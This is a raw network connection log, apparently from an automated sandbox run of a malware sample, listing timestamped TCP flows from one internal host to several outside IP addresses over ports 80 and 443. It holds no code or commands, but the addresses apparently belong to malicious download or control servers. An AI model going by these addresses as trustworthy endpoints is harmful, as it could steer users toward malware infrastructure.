Dec 13, 2024 18:53:38.131567001 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.131607056 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.132708073 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.132755995 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.132771969 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.132814884 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.133975983 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.134031057 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.134074926 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.134126902 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.135257959 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.135329962 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.135334969 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.135381937 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.136377096 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.136420965 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.136538982 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.136579990 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.137625933 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.137666941 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.137696028 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.137734890 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.138804913 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.138847113 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.138925076 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.138966084 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.140057087 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.140099049 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.140168905 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.140207052 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.141341925 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.141386986 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.141428947 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.141464949 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.142524004 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.142565012 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.142627954 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.142666101 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.143774986 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.143816948 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.143876076 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.143914938 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.144990921 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.145117044 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.145240068 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.146313906 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.146384954 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.146439075 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.147533894 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.147577047 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.147595882 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.147636890 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.148718119 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.148761034 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.148835897 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.148879051 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.149977922 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.150027037 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.150057077 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.150121927 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.151195049 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.151236057 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.151261091 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.151350975 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.152415037 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.152472019 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.152512074 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.152579069 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.153765917 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.153841972 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.153898001 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.154910088 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.155041933 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.155092001 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.156131029 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.156301975 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.156351089 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.157382965 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.157459021 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.157504082 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.158581972 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.158627033 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:38.158672094 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:38.159858942 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:39.405569077 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:39.405607939 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:39.405838013 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:39.424639940 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:39.424653053 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:39.492923975 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:39.493033886 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:39.493135929 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:39.494117022 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:39.494134903 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:40.422488928 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:40.422791958 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:40.542747974 CET	80	49876	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:40.542762995 CET	80	49890	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:40.542881012 CET	49876	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:40.542906046 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:40.629466057 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:40.722667933 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:40.722832918 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:40.749442101 CET	80	49890	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:40.774688005 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:40.774745941 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:40.775353909 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:40.794569969 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:40.794646025 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:40.836265087 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:41.562529087 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:41.562561989 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:41.563020945 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:41.563085079 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:41.570168018 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:41.570223093 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:41.570332050 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:41.571043968 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:41.611331940 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:41.933686972 CET	80	49890	185.215.113.43	192.168.2.7
Dec 13, 2024 18:53:41.933768988 CET	49890	80	192.168.2.7	185.215.113.43
Dec 13, 2024 18:53:41.936312914 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:41.937098980 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:42.003386021 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:42.003453016 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:42.003509998 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:42.003632069 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:42.003803968 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:42.003834963 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:42.016079903 CET	49886	443	192.168.2.7	149.154.167.99
Dec 13, 2024 18:53:42.016094923 CET	443	49886	149.154.167.99	192.168.2.7
Dec 13, 2024 18:53:42.056405067 CET	80	49877	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:42.056607008 CET	49877	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:42.056823969 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:42.056934118 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:42.057833910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:42.177552938 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:42.281800985 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:42.281898975 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:42.282196045 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:42.283642054 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:42.283667088 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:42.283680916 CET	49887	443	192.168.2.7	104.21.79.7
Dec 13, 2024 18:53:42.283689022 CET	443	49887	104.21.79.7	192.168.2.7
Dec 13, 2024 18:53:42.430629015 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:42.430694103 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:42.430794001 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:42.431032896 CET	49896	443	192.168.2.7	116.203.10.31
Dec 13, 2024 18:53:42.431051970 CET	443	49896	116.203.10.31	192.168.2.7
Dec 13, 2024 18:53:43.379663944 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.379746914 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.379765987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.379892111 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.379914045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.379906893 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.379908085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.379908085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.379929066 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.380013943 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380014896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380014896 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380322933 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.380354881 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.380367041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.380382061 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380424023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380424023 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.380764961 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.380816936 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.500008106 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.500153065 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.500202894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.500202894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.504143000 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.504198074 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.504199028 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.504256010 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.571624994 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.571738958 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.571733952 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.571824074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.575828075 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.575933933 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.575938940 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.575993061 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.584230900 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.584311962 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.587327957 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.587399006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.587517977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.587563038 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.595741987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.595803976 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.595837116 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.595881939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.604075909 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.604130030 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.604166985 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.604212999 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.612485886 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.612545013 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.612560987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.612612963 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.620888948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.620938063 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.620956898 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.620995045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.629280090 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.629355907 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.629401922 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.629450083 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.642390966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.642452955 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.642602921 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.642637014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.645421982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.645461082 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.645498991 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.645530939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.652631998 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.652683973 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.652730942 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.653122902 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.659862041 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.659964085 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.763616085 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.763679981 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.763856888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.763856888 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.765796900 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.765853882 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.766693115 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.766756058 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.766846895 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.766891956 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.771265984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.771353960 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.771522045 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.775836945 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.775971889 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.775974989 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.776098013 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.780369997 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.780488014 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.780565977 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.780658960 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.784890890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.784961939 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.785058975 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.785105944 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.789450884 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.789541006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.789602995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.789645910 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.793988943 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.794054985 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.794075966 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.794121027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.798646927 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.798708916 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.798801899 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.798844099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.802964926 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.803023100 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.803078890 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.803112984 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.807512045 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.807583094 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.807615042 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.807648897 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.812103987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.812145948 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.812163115 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.812179089 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.816580057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.816641092 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.816653967 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.816693068 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.821099997 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.821161032 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.821180105 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.821202993 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.825674057 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.825742006 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.825793982 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.825844049 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.830260038 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.830322981 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.830399036 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.830444098 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.834747076 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.834808111 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.834834099 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.834871054 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.839325905 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.839391947 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.839473009 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.839524031 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.843684912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.843750000 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.843846083 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.843890905 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.848239899 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.848306894 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.848390102 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.848436117 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.852783918 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.852849007 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.852890968 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.852936029 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.857316971 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.857387066 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.857398987 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.857456923 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.862066984 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.862128019 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.862133026 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.862169027 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.867034912 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.867110968 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.955529928 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.955549955 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.955631971 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.957153082 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.957216978 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.957262039 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.957309008 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.959824085 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.959886074 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.959932089 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.959978104 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.963434935 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.963499069 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.963623047 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.963668108 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.966814995 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.966878891 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.966964960 CET	80	49895	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:43.967012882 CET	49895	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:43.970221996 CET	80	49895	31.41.244.11	192.168.2.7
